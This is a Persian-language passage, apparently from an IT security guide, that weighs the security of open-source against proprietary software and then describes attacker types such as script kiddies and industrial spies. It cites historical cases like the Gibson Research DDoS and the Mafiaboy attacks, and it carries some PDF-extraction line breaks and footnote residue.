‫ﻧﺮﻡﺍﻓﺰﺍﺭ ﺁﺯﺍﺩ ﺩﺭ ﻣﻘﺎﺑﻞ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺍﺧﺘﺼﺎﺻﻲ‬
‫ﻳﻜﻲ ﺍﺯ ﻣﺒﺎﺣﺚ ﺑﺤﺚ ﺑﺮﺍﻧﮕﻴﺰﺗﺮ ﺩﺭ ﻃﺮﺍﺣﻲ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺁﻳﺎ ﻓﺮﺍﻳﻨﺪﻫﺎﻱ ﺗﻮﺳﻌﻪﺍﻱ ﻛﻪ ﺁﺯﺍﺩﺍﻧﻪ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﺭﺍ ﺑﺮﺍﻱ ﺑﺮﺭﺳﻲ‪ ،‬ﺗﻐﻴﻴﺮ‪،‬‬
‫ﻭ ﺗﻮﺯﻳﻊ ﻣﺠﺪﺩ )"ﻧﺮﻡﺍﻓﺰﺍﺭ ﺁﺯﺍﺩ" ﻳﺎ "ﻣﺘﻦﺑﺎﺯ"( ﺑﺼﻮﺭﺕ ﺁﺯﺍﺩ ﺩﺭ ﺩﺳﺘﺮﺱ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻨﺪ‪ ،‬ﺑﺎﻳﺪ ﺑﻪ ﺩﻟﻴﻞ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﺑﺮ ﻧﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﺍﺧﺘـﺼﺎﺻﻲ‬
‫)"ﻣﺘﻦﺑﺴﺘﻪ"( ﺗﺮﺟﻴﺢ ﺩﺍﺩﻩ ﺷﻮﻧﺪ ﻳﺎ ﻧﻪ‪.‬‬
‫ﺍﺯ ﻳﻚ ﻃﺮﻑ ﺍﮔﺮ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﺑﺼﻮﺭﺕ ﺁﺯﺍﺩ ﺩﺭ ﺩﺳﺘﺮﺱ ﺑﺎﺷﺪ ﻛﺎﺭ ﻣﻬﺎﺟﻤﻴﻦ ﺭﺍ ﺩﺭ ﭘﻴﺪﺍ ﻛﺮﺩﻥ ﺍﺷﻜﺎﻻﺕ ﻗﺎﺑﻞ ﺳﻮﺀ ﺍﺳـﺘﻔﺎﺩﻩ ﺩﺭ ﺑﺮﻧﺎﻣـﻪ ﺑـﺎ‬
‫ﺧﻮﺍﻧﺪﻥ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﺭﺍﺣﺖﺗﺮ ﻣﻲﻛﻨﺪ‪ .‬ﭼﻮﻥ ﻃﺒﻘﺎﺕ ﻣﺘﺪﺍﻭﻝ ﻓﺮﺍﻭﺍﻧﻲ ﺍﺯ ﺧﻄﺎﻫﺎﻱ ﺑﺮﻧﺎﻣﻪﺍﻱ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﻣﻨﺠﺮ ﺑﻪ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎ ﻣﻲﺷﻮﺩ‪،‬‬
‫ﺣﺘﻲ ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺑﻪ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺗﺤﻠﻴﻞ ﺧﻮﺩﻛﺎﺭ ﺳﭙﺮﺩ ﺗﺎ ﻣـﺸﻜﻼﺕ ﺭﺍ ﺁﺷـﻜﺎﺭ ﻛﻨﻨـﺪ‪ .‬ﻣـﺸﻜﻼﺕ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ‬
‫ﻣﺘﻦﺑﺎﺯ ﻋﻤﺪﺗﹰﺎ ﭘﻴﺪﺍ ﺷﺪﻩﺍﻧﺪ ﻭ ﻣﻮﺭﺩ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪﺍﻧﺪ‪.‬‬
‫ﺍﺯ ﻃﺮﻑ ﺩﻳﮕﺮ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﺘﻦﺑﺴﺘﻪ ﻋـﻼﺝ ﺩﺭﺩ ﻧﻴـﺴﺖ‪ .‬ﺩﺭ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﻣـﻮﺍﺭﺩ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎ ﺭﺍ ﻣـﻲﺗـﻮﺍﻥ "ﻣﻬﻨﺪﺳـﻲ ﻣﻌﻜـﻮﺱ" ﻧﻤـﻮﺩ ﻳـﺎ‬
‫ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ ﻃﺮﻳﻖ ﺍﺭﺯﻳﺎﺑﻲ ﺟﻌﺒﻪ ﺳﻴﺎﻩ‪ ٣٢‬ﺑﺮﻧﺎﻣﻪ ﺑﺪﻭﻥ ﺍﻳﻨﻜﻪ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ ﺩﺭ ﺩﺳﺘﺮﺱ ﺑﺎﺷﺪ ﺗـﺸﺨﻴﺺ ﺩﺍﺩﻩ ﺷـﻮﻧﺪ‪ .‬ﺑـﺪﻳﻬﻲ‬
‫ﻼ ﺑﺮﻧﺎﻣﺔ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺍﻃﻼﻋﺎﺕ ﺍﻳﻨﺘﺮﻧﺘﻲ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ )‪ ٣٣(IIS‬ﻧﺘﻮﺍﻧﺴﺘﻪ ﺍﺯ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻬـﺎﺟﻤﻴﻦ ﺍﺯ‬
‫ﺍﺳﺖ ﻋﺪﻡ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﻣﺘﻦ ﻣﺜ ﹰ‬
‫ﻼ‬
‫ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﻣﺨﺘﻠﻒ ﺁﻥ ﺟﻠﻮﮔﻴﺮﻱ ﻛﻨﺪ ﻭ ﺑﻨﻈﺮ ﻣﻲﺭﺳﺪ ﺍﻳﻦ ﻣﺤﺼﻮﻝ ﺗﻌﺪﺍﺩ ﺑﻴﺸﺘﺮﻱ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﮔـﺰﺍﺭﺵ ﺷـﺪﻩ ﻧـﺴﺒﺖ ﺑـﻪ ﻣـﺜ ﹰ‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻭﺏ ﺁﭘﺎﭼﻲ‪ - ٣٤‬ﻛﻪ ﻣﺘﻦ ﺁﻥ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﻋﻤﻮﻡ ﺍﺳﺖ ‪ -‬ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪.‬‬
‫ﺩﺭ ﺑﺮﻧﺎﻣﺔ ﻣﺘﻦﺑﺎﺯ‪ ،‬ﺗﻮﻟﻴﺪﻛﻨﻨﺪﮔﺎﻥ ﻭ ﻛﺎﺭﺑﺮﺍﻥ ﺑﺮﻧﺎﻣﻪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻣﺸﻜﻼﺕ ﻭ ﺭﺍﻩﺣﻞ ﺁﻧﻬـﺎ ﺭﺍ ﻗﺒـﻞ ﺍﺯ ﻣﻬـﺎﺟﻤﻴﻦ ﭘﻴـﺪﺍ ﻛﻨﻨـﺪ ﻭ ﭘـﻴﺶ ﺍﺯ ﻫـﺮ‬
‫ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩﺍﻱ ﺁﻧﻬﺎ ﺭﺍ ﻣﻨﺘﺸﺮ ﺳﺎﺯﻧﺪ‪ .‬ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ‪ OpenBSD‬ﻛﻪ ﻳـﻚ ﻧـﺮﻡﺍﻓـﺰﺍﺭ ﺁﺯﺍﺩ ﺍﺳـﺖ‪ ،‬ﺩﺭ ﺳـﻄﺢ ﻭﺳـﻴﻌﻲ ﺑﻌﻨـﻮﺍﻥ ﻳﻜـﻲ ﺍﺯ‬
‫‪Backdoor‬‬
‫‪Blackbox Testing‬‬
‫‪Microsoft Internet Information Server‬‬
‫‪Apache Web Server‬‬
‫‪31‬‬
‫‪32‬‬
‫‪33‬‬
‫‪34‬‬
‫‪٢٦٧‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬
‫ﻝ ﺣﺎﺿﺮ ﺷﻨﺎﺧﺘﻪ ﺷﺪﻩ ﺍﺳﺖ‪ ،‬ﻋﻤﺪﺗﹰﺎ ﺑﻪ ﺩﻟﻴﻞ ﺍﻳﻨﻜﻪ ﻫﺮ ﺧﻂ ﺍﺯ ﻣﺘﻦ ﺑﺮﻧﺎﻣﺔ ﻫﺴﺘﺔ ﺍﺻـﻠﻲ‪ ،٣٥‬ﺗﻮﺳـﻂ‬
‫ﺍﻳﻤﻦﺗﺮﻳﻦ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ﻣﻮﺟﻮﺩ ﺣﺎ ﹺ‬
‫ﺗﻮﻟﻴﺪﻛﻨﻨﺪﮔﺎﻧﺶ ﺍﺯ ﻧﻈﺮ ﺍﻣﻨﻴﺘﻲ ﻧﻴﺰ ﻣﻤﻴﺰﻱ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﻫﺴﺘﻪﻫﺎﻱ ﺍﺻﻠﻲ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ﻣﺘﻦﺑﺎﺯ ﺩﻳﮕـﺮ ‪ -‬ﺍﺯ ﺟﻤﻠـﻪ ‪ - Linux‬ﺑـﻪ ﺍﻳـﻦ‬
‫ﺷﺪﺕ ﺑﺎﺯﺑﻴﻨﻲ ﻧﻤﻲﺷﻮﻧﺪ ﻭ ﺣﺎﻭﻱ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﺍﺯ ﺗﻌﺪﺍﺩ ﺯﻳﺎﺩﻱ ﺍﺯ ﺗﻮﺳﻌﻪﺩﻫﻨﺪﮔﺎﻥ ﻫﺴﺘﻨﺪ‪ .‬ﻣﺸﻜﻞ ﻣﻲﺗـﻮﺍﻥ ﺩﺭﺟـﻪ ﺑـﺎﺯﺑﻴﻨﻲ ﺍﻣﻨﻴﺘـﻲ‬
‫ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ﺍﺧﺘﺼﺎﺻﻲ ‪ Unix‬ﺍﺯ ﻗﺒﻴﻞ ‪ Solaris‬ﺭﺍ ﺩﺍﻧﺴﺖ‪.‬‬
‫ﺷﻨﺎﺧﺘﻦ ﻣﻬﺎﺟﻢ‬
‫ﭼﻪ ﻛﺴﻲ ﺑﻪ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻳﻚ ﺷﺒﻜﻪ ﺑﺎ ﺧﺒﺮﻩﺗﺮﻳﻦ ﺍﻧﻮﺍﻉ ﺣﻤﻼﺕ ﻧﻔﻮﺫ ﻣﻲﻛﻨﺪ؟ ﺍﻳـﻦ ﻣـﺴﺌﻠﻪ ﺗﻘﺮﻳﺒـﹰﺎ ﺍﻫﻤﻴﺘـﻲ ﻧـﺪﺍﺭﺩ؛ ﻳﻌﻨـﻲ ﻣﻬـﻢ ﻧﻴـﺴﺖ‬
‫ﻣﻬﺎﺟﻤﻴﻦ ﻣﻤﻜﻦ ﺍﺳﺖ ﭼﻪ ﻛﺴﺎﻧﻲ ﺑﺎﺷﻨﺪ‪ ،‬ﺑﻠﻜﻪ ﺩﺭ ﻣﻘﺎﺑﻞ ﻫﻤﺔ ﺁﻧﻬﺎ ﺑﺎﻳﺪ ﺍﺯ ﺳﻴﺴﺘﻢ ﻣﺤﺎﻓﻈﺖ ﻛﺮﺩ‪.‬‬
‫‪Script Kiddie‬ﻫﺎ‬
‫ﻫﻤﺎﻧﮕﻮﻧﻪ ﻛﻪ ﺍﺯ ﻧﺎﻡ ﺁﻧﻬﺎ ﭘﻴﺪﺍﺳﺖ‪ ،‬ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﻮﺍﺭﺩ ﻣﻬﺎﺟﻤﻴﻦ ﻛﻮﺩﻛﺎﻥ ﻭ ﻧﻮﺟﻮﺍﻧﺎﻥ ﻫﺴﺘﻨﺪ؛ ﻛـﺴﺎﻧﻲ ﻛـﻪ ﻣﺘﺄﺳـﻔﺎﻧﻪ ﻫﻨـﻮﺯ ﺑـﻪ ﺣـﺲ‬
‫ﻣﺴﺌﻮﻟﻴﺖ ﻭ ﺗﺸﺨﻴﺺ ﻛﺎﻓﻲ ﺑﺮﺍﻱ ﻛﻨﺘﺮﻝ ﻣﻬﺎﺭﺗﻬﺎﻱ ﺗﻜﻨﻴﻜﻲ ﺧﻮﺩ ﻧﺮﺳﻴﺪﻩﺍﻧﺪ‪.‬‬
‫ﺑﻪ ﺟﻮﺍﻧﺎﻧﻲ ﻛﻪ ﺍﺯ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺧﺒﺮﺓ ﺗﻬﺎﺟﻢ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ‪) Script Kiddie‬ﻓﺴﻘﻠﻲﻫﺎﻱ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪ( ﻣﻲﮔﻮﻳﻨﺪ‪ .‬ﺍﻳـﻦ ﻋﺒـﺎﺭﺕ ﺗﻤـﺴﺨﺮﺁﻣﻴﺰ‬
‫ﺍﺳﺖ‪ .‬ﻭﺍﮊﺓ "ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪ" ﺑﻪ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺍﺷﺎﺭﻩ ﺩﺍﺭﺩ ﻛﻪ ﺍﻳﻦ ﻣﻬﺎﺟﻤﻴﻦ ﺑﺠﺎﻱ ﺍﻳﻨﻜﻪ ﺣﻤـﻼﺕ ﺧـﻮﺩ ﺭﺍ ﭘﺪﻳـﺪ ﺁﻭﺭﻧـﺪ ﺍﺯ ﻗﻄﻌـﻪﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ‬
‫ﺗﻬﺎﺟﻤﻲ ﺁﻣﺎﺩﻩ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﺍﻳﻨﺘﺮﻧﺖ ‪ download‬ﺷﻮﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺍﻳﻦ ﻣﻬﺎﺟﻤﻴﻦ ﺍﺯ ﺁﻥ ﺟﻬﺖ "ﻓﺴﻘﻠﻲ" ﻧﺎﻣﻴﺪﻩ ﻣـﻲﺷـﻮﻧﺪ ﻛـﻪ‬
‫ﺳﻦ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺁﻧﻬﺎ ﻫﻨﮕﺎﻡ ﺩﺳﺘﮕﻴﺮﻱ ﺯﻳﺮ ﺳﻦ ﻗﺎﻧﻮﻧﻲ ﺑﻮﺩﻩ ﺍﺳﺖ‪.‬‬
‫ﻓﺴﻘﻠﻲﻫﺎﻱ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪ ﺑﺎﻳﺪ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﺗﻬﺪﻳﺪ ﻭ ﺧﻄﺮ ﺟﺪﻱ ﺑﻪ ﺣﺴﺎﺏ ﺁﻳﻨﺪ‪ ،‬ﺑﻪ ﻫﻤﺎﻥ ﺩﻟﻴـﻞ ﻛـﻪ ﺍﺯ ﻧﻮﺟـﻮﺍﻧﻲ ﻛـﻪ ﺍﺳـﻠﺤﻪ ﺩﺍﺭﺩ ﺑﺎﻳـﺪ‬
‫ﺗﺮﺳﻴﺪ‪ .‬ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﻮﺍﺭﺩ ﺍﺯ ﻧﻮﺟﻮﺍﻧﺎﻧﻲ ﻛﻪ ﺍﺳﻠﺤﺔ ﺳﺒﻚ ﺣﻤﻞ ﻣﻲﻛﻨﻨﺪ ﺑﺎﻳﺪ ﺣﺘﻲ ﺑﻴﺶ ﺍﺯ ﺑﺰﺭﮔﺴﺎﻻﻥ ﺗﺮﺳﻴﺪ‪ ،‬ﭼﺮﺍ ﻛـﻪ ﻳـﻚ ﻧﻮﺟـﻮﺍﻥ‬
‫ﻭﻗﺘﻲ ﻣﻲﺧﻮﺍﻫﺪ ﻣﺎﺷﻪ ﺭﺍ ﺑﻜﺸﺪ ﻛﻤﺘﺮ ﺍﺣﺘﻤﺎﻝ ﺩﺍﺭﺩ ﭘﻴﺎﻣﺪﻫﺎﻱ ﻋﻤﻞ ﺧﻮﺩ ﺭﺍ ﺑﻔﻬﻤﺪ ﻭ ﻟﺬﺍ ﺍﺣﺘﻤﺎﻝ ﺑﻴﺸﺘﺮﻱ ﺩﺍﺭﺩ ﻛﻪ ﻣﺎﺷﻪ ﺭﺍ ﺑﻜﺸﺪ‪.‬‬
‫ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺑﺮﺍﻱ ﻓﺴﻘﻠﻲﻫﺎﻱ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪ ﻫﻢ ﺻﺪﻕ ﻣﻲﻛﻨﺪ‪ .‬ﺑﺮﺍﻱ ﻣﺜﺎﻝ ﺩﺭ ﺳﺎﻝ ‪ ۲۰۰۱‬ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻣﺆﺳﺴﻪ ﺗﺤﻘﻴﻘﺎﺗﻲ ﮔﻴﺒﺴﻮﻥ‪ ٣٦‬ﻫﺪﻑ‬
‫ﻳﻚ ﺗﻬﺎﺟﻢ ﺗﻮﺯﻳﻊﺷﺪﻩ ﺧﺮﺍﺑﻲ ﺳﺮﻭﻳﺲ )‪ ٣٧(DDoS‬ﻗﺮﺍﺭ ﮔﺮﻓﺖ ﻛﻪ ﺁﻧﺮﺍ ﺑﻴﺶ ﺍﺯ ‪ ۱۷‬ﺳﺎﻋﺖ ﺍﺯ ﻛﺎﺭ ﺍﻧﺪﺍﺧﺖ‪ .‬ﺗﻬﺎﺟﻢ ﺍﺯ ﻃﺮﻳﻖ ﺑـﻴﺶ ﺍﺯ ‪۴۰۰‬‬
‫ﺭﺍﻳﺎﻧﻪ ﻣﺒﺘﻨﻲ ﺑﺮ ‪ Windows‬ﺭﻭﻱ ﺍﻳﻨﺘﺮﻧﺖ ﺑﻪ ﺍﺟﺮﺍ ﺭﺳﻴﺪ ﻛﻪ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﻳﻚ ﺣﻤﻠﺔ ﺧﻮﺩﻛﺎﺭ ﻣﻮﺭﺩ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺑﻮﺩﻧﺪ‪ .‬ﻭﻗﺘـﻲ‬
‫ﻣﺴﺌﻠﻪ ﺭﻭﺷﻦ ﺷﺪ‪ ،‬ﺍﺳﺘﻴﻮ ﮔﻴﺒﺴﻮﻥ‪ ٣٨‬ﺗﻮﺍﻧﺴﺖ ﻳﻚ ﻧﺴﺨﻪ ﺍﺯ ﺑﺮﻧﺎﻣﺔ ﺣﻤﻠﻪ ﺭﺍ ﺑﺪﺳﺖ ﺁﻭﺭﺩ‪ ،‬ﻭ ﺳﭙﺲ ﺁﻧﺮﺍ ﻣﻬﻨﺪﺳﻲ ﻣﻌﻜﻮﺱ ﻭ ﺭﺩﻳﺎﺑﻲ ﻛﻨـﺪ‪.‬‬
‫ﺩﺭ ﻧﻬﺎﻳﺖ ﻣﺸﺨﺺ ﺷﺪ ﻛﻪ ﻓﺮﺩ ﻣﻬﺎﺟﻢ ﺑﻪ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺍﻭ ﻳﻚ ﺩﺧﺘﺮ ‪ ۱۳‬ﺳﺎﻟﻪ ﺑﻮﺩﻩ ﺍﺳﺖ‪.‬‬
‫ﻓﺴﻘﻠﻲﻫﺎﻱ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﻬﺎﺭﺕ ﻓﻨﻲ ﻻﺯﻡ ﺑﺮﺍﻱ ﻧﻮﺷﺘﻦ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪ ﻭ ﺍﺳﺒﻬﺎﻱ ﺗﺮﺍﻭﺍﻱ ﻣﺨﺼﻮﺹ ﺧـﻮﺩ ﺭﺍ ﻧﺪﺍﺷـﺘﻪ ﺑﺎﺷـﻨﺪ‪،‬‬
‫ﻭﻟﻲ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺑﺮﺍﻳﺸﺎﻥ ﻣﺸﻜﻞ ﺯﻳﺎﺩﻱ ﺍﻳﺠﺎﺩ ﻧﻤﻲﻛﻨﺪ‪ .‬ﺁﻧﻬﺎ ﺍﺑﺰﺍﺭ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺭﻧﺪ ﻭ ﻣﺎﻳﻠﻨﺪ ﺍﺯ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺧﻮﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ؛ ﻳﺎ ﻧﻤﻲﻓﻬﻤﻨـﺪ‬
‫ﻣﻮﺟﺐ ﭼﻪ ﺧﺴﺎﺭﺍﺗﻲ ﻣﻲﺷﻮﻧﺪ ﻭ ﻳﺎ ﺑﺮﺍﻳﺸﺎﻥ ﺍﻫﻤﻴﺘﻲ ﻧﺪﺍﺭﺩ‪.‬‬
‫‪Kernel‬‬
‫‪Gibson Research Corporation‬‬
‫‪Distributed Denial of Service Attack‬‬
‫‪Steve Gibson‬‬
‫‪35‬‬
‫‪36‬‬
‫‪37‬‬
‫‪38‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬
‫ﺩﺭ ﻣﻮﺭﺩ ﻣﺸﺎﺑﻪ ﺩﻳﮕﺮﻱ ﻭﻗﺘﻲ ﻣﻘﺎﻣﺎﺕ ﻣﺴﺌﻮﻝ ﻛﺎﻧﺎﺩﺍ ﺩﺭ ﻧﻮﺯﺩﻫﻢ ﺁﻭﺭﻳﻞ ﺳﺎﻝ ‪ "Mafiaboy" ۲۰۰۰‬ﺭﺍ ﺑﻪ ﺧﺎﻃﺮ ﺣﻤﻼﺕ ﻣﺎﻩ ﻓﻮﺭﻳﻪ ﺳـﺎﻝ‬
‫‪ ۲۰۰۰‬ﺍﻭ ﺑﻪ ‪ ،CNN ،E*TRADE ،Yahoo‬ﻭ ﺑﺴﻴﺎﺭﻱ ﺩﻳﮕﺮ ﺍﺯ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﭘﺮ ﺍﺯ ﭘﺮﻭﺭﻧﺪﻩﻫﺎﻱ ﺷﺨﺼﻲ ﻛﻪ ﻣﻮﺟﺐ ‪ ۱/۷‬ﻣﻴﻠﻴـﺎﺭﺩ ﺩﻻﺭ‬
‫ﺧﺴﺎﺭﺕ ﺷﺪﻩ ﺑﻮﺩ ﺑﺎﺯﺩﺍﺷﺖ ﻛﺮﺩﻧﺪ‪ ،‬ﻧﺘﻮﺍﻧﺴﺘﻨﺪ ﻧﺎﻡ ﻣﺘﻬﻢ ﺭﺍ ﺑﺮﺍﻱ ﻣﺮﺩﻡ ﻣﻨﺘﺸﺮ ﻛﻨﻨﺪ؛ ﭼﺮﺍ ﻛﻪ ﭘـﺴﺮﺑﭽﺔ ‪ ۱۶‬ﺳـﺎﻟﻪ‪ ،‬ﺗﺤـﺖ ﺣﻤﺎﻳـﺖ ﻗـﺎﻧﻮﻥ‬
‫ﺣﻔﺎﻇﺖ ﺍﺯ ﺯﻧﺪﮔﻲ ﺷﺨﺼﻲ ﺧﺮﺩﺳﺎﻻﻥ ﻛﺎﻧﺎﺩﺍ ﻗﺮﺍﺭ ﺩﺍﺷﺖ‪.‬‬
‫‪٢٦٨‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﻳﻚ ﻓﺴﻘﻠﻲ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪ ﻭﻗﺘﻲ ﺑﺰﺭﮒ ﺷﺪ ﭼﻜﺎﺭﻩ ﺧﻮﺍﻫﺪ ﺷﺪ؟ ﻫـﻴﭽﻜﺲ ﻫﻨـﻮﺯ ﻣﻄﻤـﺌﻦ ﻧﻴـﺴﺖ؛ ﻫـﻴﭻ ﺑﺮﺭﺳـﻲ ﻣـﻮﺛﻘﻲ ﻭﺟـﻮﺩ ﻧـﺪﺍﺭﺩ‪.‬‬
‫ﮔﺰﺍﺭﺷﻬﺎﻱ ﻏﻴﺮ ﺭﺳﻤﻲ ﻣﻲﮔﻮﻳﺪ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻓﺴﻘﻠﻲﻫﺎﻱ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪ ﺑﻪ ﺭﺍﻩ ﺭﺍﺳﺖ ﻫﺪﺍﻳﺖ ﻣﻲﺷﻮﻧﺪ‪ .‬ﺑﻌﻀﻲ ﺍﺯ ﺁﻧﻬﺎ ﻋﻼﻗﻪ ﺑـﻪ ﺭﺍﻳﺎﻧـﻪ ﺭﺍ ﺍﺯ‬
‫ﺩﺳﺖ ﻣﻲﺩﻫﻨﺪ‪ ،‬ﺑﻌﻀﻲ ﻣﺘﺼﺪﻱ ﺳﻴﺴﺘﻢ ﻳﺎ ﺭﺍﻫﺒﺮ ﺷﺒﻜﻪ ﻣﻲﺷﻮﻧﺪ‪ ،‬ﻭ ﺣﺘﻲ ﺑﻌﻀﻲ ﺍﺯ ﺁﻧﻬﺎ ﺑﻪ ﺣﻮﺯﺓ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪ ﺑﺎﺯﻣﻲﮔﺮﺩﻧﺪ )ﺍﺳﺘﺨﺪﺍﻡ ﭼﻨﻴﻦ‬
‫ﺍﻓﺮﺍﺩﻱ ﺑﺮﺍﻱ ﻧﻈﺎﺭﺕ ﺑﺮ ﺷﺒﻜﻪ‪ ،‬ﺩﺭ ﻣﺠﺎﻣﻊ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻫﻨﻮﺯ ﻣﻮﺿﻮﻋﻲ ﻣﻮﺭﺩ ﻣﻨﺎﻗﺸﻪ ﺍﺳـﺖ(‪ ،‬ﻭﻟﻲ ﻧﺎﮔﻔﺘﻪ ﭘﻴﺪﺍﺳﺖ ﻛﻪ ﺑﺮﺧﻲ ﺍﺯ ﺍﻳﻦ ﺍﻓﺮﺍﺩ ﺑـﻪ ﺯﻧـﺪﮔﻲ‬
‫ﺗﺒﻬﻜﺎﺭﺍﻧﺔ ﺧﻮﺩ ﺍﺩﺍﻣﻪ ﻣﻲﺩﻫﻨﺪ‪.‬‬
‫ﺟﺎﺳﻮﺳﻬﺎﻱ ﺻﻨﻌﺘﻲ‬
‫ﺑﻪ ﻧﻈﺮ ﻣﻲﺭﺳﺪ ﻛﻪ ﺑﺎﺯﺍﺭ ﺳﻴﺎﻩ ﺩﺭﺣﺎﻝ ﺭﺷﺪﻱ ﺑﺮﺍﻱ ﺍﻃﻼﻋﺎﺕ ﺳﺮﻗﺖﺷﺪﻩ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ .‬ﺑﻌﻀﻲ ﺍﻓﺮﺍﺩ ﻛﻮﺷﺶ ﻛﺮﺩﻩ‪-‬‬
‫ﻼ ﭘﻴﺸﻨﻬﺎﺩ ﺭﻓﻊ ﺁﺳـﻴﺐﭘـﺬﻳﺮﻳﻬﺎﻱ ﻳـﻚ ﺷـﺮﻛﺖ ﺩﺭ ﻗﺒـﺎﻝ ﺩﺭﻳﺎﻓـﺖ ﻣﺒـﺎﻟﻎ‬
‫ﺍﻧﺪ ﺍﺯ ﺻﺎﺣﺒﺎﻥ ﻗﺎﻧﻮﻧﻲ ﺍﻃﻼﻋﺎﺕ ﺑﺎﺟﮕﻴﺮﻱ ﻭ ﺍﺧﺎﺫﻱ ﻛﻨﻨﺪ‪ .‬ﻣﺜ ﹰ‬
‫ﻫﻨﮕﻔﺖ ﺭﺍ ﺩﺍﺩﻩﺍﻧﺪ‪ .‬ﭼﻨﺪﻳﻦ ﻣﻮﺭﺩ ﻣﺴﺘﻨﺪ )ﻭ ﺍﺣﺘﻤﺎ ﹰﻻ ﻣﻮﺍﺭﺩ ﻣﺘﻌﺪﺩ ﮔﺰﺍﺭﺵ ﻧﺸﺪﻩ( ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺍﺳـﺖ ﻛـﻪ ﺩﺭ ﺁﻧﻬـﺎ ﻣﺠﺮﻣـﺎﻥ‪ ،‬ﺷـﻤﺎﺭﺓ ﻛﺎﺭﺗﻬـﺎﻱ‬
